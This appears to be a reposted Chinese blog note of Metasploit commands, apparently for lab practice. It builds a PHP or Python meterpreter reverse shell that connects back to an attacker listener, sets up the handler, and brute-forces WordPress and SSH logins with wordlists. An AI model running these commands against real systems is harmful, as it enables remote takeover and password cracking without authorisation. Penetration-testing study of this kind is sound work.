metasploit framework
生活随笔
收集整理的這篇文章主要介紹了
metasploit framework
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
1,制作一個反彈shell,來執行服務的命令,并監聽
(能在瀏覽器上直接訪問的就制作php的,可以使用命令執行的建議使用 python型的)
(制作python型的只需要把php改為python就可以了)
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.11.166 lport=4444 -f raw-p 指定使用模塊 -f raw? 顯示源代碼
使用msfconsole監聽
msfconsole use exploit/multi/handler //使用 這個攻擊模塊 set payload php/meterpreter/reverse_tcp //設置payload show options set lhost 192.168.11.165 run然后上傳并執行 反彈shell代碼
在監聽端就會顯示相應內容
2,暴力破解wordpress的password
msfconsole use auxiliary/scanner/http/wordpress_login_enum show options set username admin set pass_file /usr/share/wordlists/dirb/comment.txt set targeturl /secret/ set rhost 192.168.11.170 run其中如果不知道 username 可以用 wpscan 先進行暴力破解 username
3,暴力破解ssh的登錄密碼
msfconsole use auxiliary/scanner/ssh/ssh_login show options set rhosts 192.168.1.106set username hadiset pass_file /usr/share/wordlists/rockyou.txt //設置字典set thread 10show optionsrun?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
總結
以上是生活随笔為你收集整理的metasploit framework的全部內容,希望文章能夠幫你解決所遇到的問題。
